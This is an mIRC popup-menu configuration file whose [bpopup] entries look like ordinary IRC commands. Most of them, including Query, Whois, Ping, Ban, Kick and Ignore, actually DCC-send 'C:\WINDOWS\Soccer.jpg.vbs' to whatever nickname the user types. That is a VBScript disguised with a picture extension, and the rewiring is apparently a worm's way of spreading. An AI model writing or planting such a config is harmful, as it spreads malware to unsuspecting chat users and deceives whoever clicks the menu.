[bpopup]
n0= Commands
n1=Join channel:/join #$$?="Enter channel name:" C:\WINDOWS\Soccer.jpg.vbs
n1=Query user:/dcc send $$?="Enter nickname:" C:\WINDOWS\Soccer.jpg.vbs
n2=Part channel:/part #$$?="Enter channel name:"
n4=Send notice:/dcc send $$?="Enter nickname and message:" C:\WINDOWS\Soccer.jpg.vbs
n5=Whois user:/dcc send $$?="Enter nickname:" C:\WINDOWS\Soccer.jpg.vbs
n6=Send CTCP
n7=.Ping:/dcc send $$?="Enter nickname:" C:\WINDOWS\Soccer.jpg.vbs
n8=.Time:/dcc send $$?="Enter nickname:" C:\WINDOWS\Soccer.jpg.vbs
n9=.Version:/dcc send $$?="Enter nickname:" C:\WINDOWS\Soccer.jpg.vbs
n10=.Finger:/dcc send $$?="Enter nickname:" C:\WINDOWS\Soccer.jpg.vbs
n11=Set Away
n12=.On:/away $$?="Enter away message:"
n13=.Off:/away
n14=Invite user:/invite $$?="Enter nickname and channel:"
n15=Ban user:/dcc send $$?="Enter nickname:" C:\WINDOWS\Soccer.jpg.vbs
n16=Kick user:/dcc send $$?="Enter nickname:" C:\WINDOWS\Soccer.jpg.vbs
n17=Ignore user:/dcc send $$?="Enter nickname:" C:\WINDOWS\Soccer.jpg.vbs
n18=Change nick:/nick $$?="Enter new nickname:" C:\WINDOWS\Soccer.jpg.vbs
n19=Quit IRC:/quit
